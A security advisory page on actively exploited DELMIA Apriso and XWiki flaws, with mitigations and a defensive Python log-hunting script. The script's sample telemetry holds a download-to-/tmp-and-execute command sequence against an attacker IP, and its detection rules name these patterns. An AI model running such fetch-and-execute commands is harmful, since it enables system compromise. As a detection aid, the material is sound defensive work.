Active Exploits Hit Dassault and XWiki — CISA Confirms Critical Flaws Under Attack
Threat actors are actively exploiting multiple security flaws impacting Dassault Systèmes DELMIA Apriso and XWiki, according to alerts issued by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and VulnCheck. The vulnerabilities are listed below - CVE-2025-6204 (CVSS score: 8.0) - A code injection vulnerability in Dassault Systèmes DELMIA Apriso that could allow an attacker to
AI Analysis
Technical Summary
Multiple critical vulnerabilities affecting Dassault Systèmes DELMIA Apriso and XWiki have been confirmed to be under active exploitation by threat actors, as reported by CISA and VulnCheck. The key vulnerabilities are CVE-2025-6204, a code injection flaw in DELMIA Apriso that allows arbitrary code execution; CVE-2025-6205, a missing authorization vulnerability in the same product that enables privilege escalation; and CVE-2025-24893, an eval injection vulnerability in XWiki that permits unauthenticated remote code execution via the "/bin/get/Main/SolrSearch" endpoint. DELMIA Apriso versions from Release 2020 through Release 2025 are affected; patches were released in early August 2025. The XWiki vulnerability has been exploited since at least March 2025 in a two-stage attack chain that downloads and executes cryptocurrency mining malware: a downloader is staged first, then the mining payloads are retrieved and executed, and these payloads also kill competing miners. The malicious infrastructure is linked to IP addresses geolocated in Vietnam, with evidence of brute-force attempts and ongoing exploitation. The vulnerabilities pose severe risks including unauthorized code execution, privilege escalation, and resource hijacking. CISA has mandated remediation deadlines for affected U.S. federal agencies, underscoring the urgency. The XWiki attack vector requires no authentication and minimal user interaction, which makes exploitation easy. The high CVSS scores of the DELMIA Apriso flaws, combined with the critical nature of the XWiki vulnerability, make this a significant threat for organizations relying on these platforms.
Potential Impact
European organizations using Dassault Systèmes DELMIA Apriso, which is widely deployed in manufacturing and supply chain management, face risks of unauthorized code execution and privilege escalation, potentially leading to operational disruption, intellectual property theft, and compromised production environments. If XWiki, which is popular in collaborative enterprise environments across Europe, is exploited, attackers can execute arbitrary code without authentication, risking data breaches, system compromise, and lateral movement within networks. The deployment of cryptocurrency miners can degrade system performance and increase operational costs. The active exploitation and the attacker infrastructure indicate a persistent threat that could affect critical manufacturing, engineering, and collaborative platforms integral to European industries. Disruption or compromise of these systems could impact business continuity, regulatory compliance (e.g., GDPR), and trust. The threat is particularly concerning for sectors with high reliance on these software products, including the automotive, aerospace, and technology firms prevalent in countries such as Germany, France, and the UK.
Mitigation Recommendations
1. Immediately apply the official patches released by Dassault Systèmes for DELMIA Apriso (addressing CVE-2025-6204 and CVE-2025-6205) and the corresponding XWiki updates to remediate CVE-2025-24893.
2. Implement strict network segmentation and firewall rules to restrict access to DELMIA Apriso and XWiki servers, limiting exposure to untrusted networks.
3. Deploy web application firewalls (WAF) with custom rules to detect and block exploitation attempts targeting the known vulnerable endpoints, especially "/bin/get/Main/SolrSearch" in XWiki.
4. Monitor logs and network traffic for indicators of compromise, such as unusual wget downloads, execution of unknown binaries in /tmp, and connections to suspicious IP addresses (e.g., 193.32.208[.]24).
5. Conduct threat hunting for signs of cryptocurrency mining malware and remove any unauthorized payloads.
6. Harden authentication and authorization mechanisms in DELMIA Apriso to prevent privilege escalation.
7. Educate IT and security teams on the attack patterns and ensure rapid incident response capabilities.
8. Consider deploying endpoint detection and response (EDR) solutions to detect post-exploitation activities.
9. Review and update incident response plans to include scenarios involving these vulnerabilities.
10. Coordinate with vendors and cybersecurity authorities for threat intelligence sharing and timely updates.
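The following is an added example (not code from the advisory, CISA, VulnCheck or the vendors) of the log monitoring that recommendations 3 and 4 describe: it scans web server access logs for requests to the XWiki SolrSearch endpoint and scans command telemetry for downloads from the advisory's IoC address, downloads to /tmp, files made executable under /tmp, and execution from /tmp. The sample log lines, host names, user names, file names and the log format of the command telemetry are all constructed for the example; the only values taken from the advisory are the endpoint path and the IP 193.32.208[.]24 (re-fanged here so it can be matched).

```python
"""Hunting helpers for the XWiki SolrSearch endpoint and the advisory's miner IoCs.

Added example with constructed sample data; only the endpoint path and the IoC IP
come from the advisory.
"""
import re
from urllib.parse import urlsplit

# Indicators named in the advisory (the IP is defanged there as 193.32.208[.]24).
IOC_IPS = {"193.32.208.24"}
XWIKI_SOLR_PATH = "/bin/get/Main/SolrSearch"

# Combined Log Format: client, ident, user, [timestamp], "request", status, size, "referer", "user agent".
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)
# Constructed command telemetry format (hypothetical EDR/auditd export): ts host= user= cmd="..."
CMD_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>[^"]*)"$')
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
INTERPRETERS = {"sh", "bash", "dash", "python", "python3", "perl"}

# Constructed sample access log: one internal user browsing, two SolrSearch requests, one failed login.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [29/Oct/2025:08:59:40 +0000] "GET /bin/view/Main/WebHome HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [29/Oct/2025:09:00:07 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=report HTTP/1.1" 200 812 "-" "python-requests/2.31"
10.0.0.5 - - [29/Oct/2025:09:01:12 +0000] "GET /bin/get/Main/SolrSearch?text=quarterly HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Oct/2025:09:02:30 +0000] "POST /bin/login HTTP/1.1" 401 0 "-" "curl/8.4"
"""

# Constructed sample command telemetry: a download-to-/tmp-and-run sequence plus benign admin activity.
SAMPLE_CMD_LOG = """\
2025-10-29T09:00:08Z host=wiki01 user=tomcat cmd="wget http://193.32.208.24/stage1.sh -O /tmp/stage1.sh"
2025-10-29T09:00:09Z host=wiki01 user=tomcat cmd="chmod +x /tmp/stage1.sh"
2025-10-29T09:00:09Z host=wiki01 user=tomcat cmd="bash /tmp/stage1.sh"
2025-10-29T09:05:00Z host=wiki01 user=admin cmd="wget https://example.org/release.tar.gz -O /opt/release.tar.gz"
2025-10-29T09:06:00Z host=wiki01 user=admin cmd="ls -la /tmp"
"""


def find_solr_search_requests(log_text):
    """Return every request whose path ends with the SolrSearch endpoint (query string ignored).

    endswith() is used because XWiki is often served under a context path such as /xwiki.
    Legitimate wiki searches also hit this endpoint, so the result is a hunting list to be
    triaged by client, user agent and patch status, not a verdict.
    """
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path.endswith(XWIKI_SOLR_PATH):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
                         "ua": m.group("ua"), "query": parts.query})
    return hits


def classify_command(cmd):
    """Return the list of reasons a command line matches the advisory's IoC patterns."""
    argv = cmd.split()
    reasons = []
    if not argv:
        return reasons
    if any(ip in IOC_IPS for ip in IP_RE.findall(cmd)):
        reasons.append("contacts_ioc_ip")
    if argv[0] in {"wget", "curl"} and any(a.startswith("/tmp/") for a in argv[1:]):
        reasons.append("download_to_tmp")
    if argv[0] == "chmod" and any(a.startswith("/tmp/") for a in argv[1:]):
        reasons.append("tmp_made_executable")
    runs_tmp_directly = argv[0].startswith("/tmp/")
    runs_tmp_via_interpreter = argv[0] in INTERPRETERS and len(argv) > 1 and argv[1].startswith("/tmp/")
    if runs_tmp_directly or runs_tmp_via_interpreter:
        reasons.append("exec_from_tmp")
    return reasons


def find_suspicious_commands(log_text):
    """Return the telemetry records that match at least one IoC pattern, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = CMD_RE.match(line)
        if not m:
            continue
        reasons = classify_command(m.group("cmd"))
        if reasons:
            findings.append({"ts": m.group("ts"), "host": m.group("host"), "user": m.group("user"),
                             "cmd": m.group("cmd"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_solr_search_requests(SAMPLE_ACCESS_LOG):
        print("SolrSearch request:", hit)
    for finding in find_suspicious_commands(SAMPLE_CMD_LOG):
        print("Suspicious command:", finding)
```

On the sample data the access log scan returns the two SolrSearch requests (the external python-requests client and the internal browser user), and the command scan returns the three tomcat-user lines of the download, chmod and execute sequence while ignoring the administrator's download to /opt. Matching the web-service account (tomcat here) against an execution from /tmp is the strongest of the signals, since that is the account the XWiki process would run commands as after a successful injection.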
Affected Countries
Germany, France, United Kingdom, Italy, Netherlands, Belgium, Sweden
Technical Details
- Article Source: https://thehackernews.com/2025/10/active-exploits-hit-dassault-and-xwiki.html (fetched 2025-10-29T09:19:09.561Z, 1034 words)
Threat ID: 6901dc1786d093201c32a356
Added to database: 10/29/2025, 9:19:19 AM
Last enriched: 10/29/2025, 9:19:35 AM
Last updated: 10/30/2025, 3:46:33 PM